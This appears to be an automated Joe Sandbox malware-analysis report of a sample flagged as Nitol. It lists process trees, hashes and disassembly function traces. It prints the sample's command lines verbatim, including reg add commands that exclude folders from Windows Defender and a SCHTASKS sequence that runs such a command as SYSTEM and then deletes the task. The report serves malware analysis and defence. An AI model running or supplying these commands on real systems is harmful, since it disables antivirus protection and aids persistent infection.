Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff711d90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7ce540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7ce540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	09:12:59
Start date:	24/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff711d90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:13:43
Start date:	24/12/2024
Path:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Imagebase:	0x40000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	09:13:45
Start date:	24/12/2024
Path:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Imagebase:	0x40000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	09:13:45
Start date:	24/12/2024
Path:	C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe"
Imagebase:	0x8e0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	09:13:46
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	09:13:46
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	09:13:46
Start date:	24/12/2024
Path:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Imagebase:	0x40000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	09:13:46
Start date:	24/12/2024
Path:	C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe"
Imagebase:	0x8e0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	09:14:01
Start date:	24/12/2024
Path:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Imagebase:	0x40000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	09:14:01
Start date:	24/12/2024
Path:	C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe"
Imagebase:	0x8e0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.3%
Total number of Nodes:	458
Total number of Limit Nodes:	10

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

t, xrefs: 0000000140005EF1
a, xrefs: 0000000140005F96
m, xrefs: 0000000140005F91
c, xrefs: 0000000140005F69
l, xrefs: 0000000140005F82
L, xrefs: 0000000140005EB9
t, xrefs: 0000000140005F73
c, xrefs: 0000000140005FAA
s, xrefs: 0000000140005EA1
., xrefs: 0000000140005F78
r, xrefs: 0000000140005F6E
p, xrefs: 0000000140005EB1
m, xrefs: 0000000140005F5A
., xrefs: 0000000140005ED9
M, xrefs: 0000000140005EA9
t, xrefs: 0000000140005ED1
M, xrefs: 0000000140005E99
l, xrefs: 0000000140005F87
i, xrefs: 0000000140005EC1
a, xrefs: 0000000140005EE9
l, xrefs: 0000000140005FA0
v, xrefs: 0000000140005F64
d, xrefs: 0000000140005F7D
s, xrefs: 0000000140005F5F
s, xrefs: 0000000140005EC9
l, xrefs: 0000000140005F9B
o, xrefs: 0000000140005FA5
d, xrefs: 0000000140005EE1

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFE11BD1C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE11BD1C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE11BD1C7A
_RTC_Initialize.LIBCMT ref: 00007FFE11BD1CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE11BD1CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFE11BD1CF9

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: 615c3f8a6db37f2944ac19669eec8d98e06e9961113f238bb048b729fed21f21
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: 0A817D21E0DE83C6FF78AF679441AF92298AF457B8F4460F5EA0D477B2DE2CE4458610

Function 00007FFE11BD1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFE11BD1753
FreeLibrary.KERNEL32 ref: 00007FFE11BD1981

Part of subcall function 00007FFE11BD1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE11BD1BC0
Part of subcall function 00007FFE11BD1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE11BD1BC6

Part of subcall function 00007FFE11BD1720: FindFirstFileA.KERNELBASE ref: 00007FFE11BD1536

Strings

WordpadFilter.db, xrefs: 00007FFE11BD1527

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 2a2ee9a03b14eddbde6672f27120bf49497da0690ae50d88a575289e15a62e38
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: 42317A32B19F41C9E714CFA2D8406AD73A9EB88798F049675EE8C13B55EE3CD152C340

Function 00007FFE11BD11B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE11BD14EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE11BD14F7

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 10e701f28a33026870089a99529b2f0c124b459fbc922cd439d8cbcb66e6e1d0
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: DF817F23A19F8285EB258F3694005F9A698FF56BE8F149335EF58537A2DF3CE0918700

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

SeLoadDriverPrivilege, xrefs: 000000014000402A
null, xrefs: 0000000140003FCE
ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
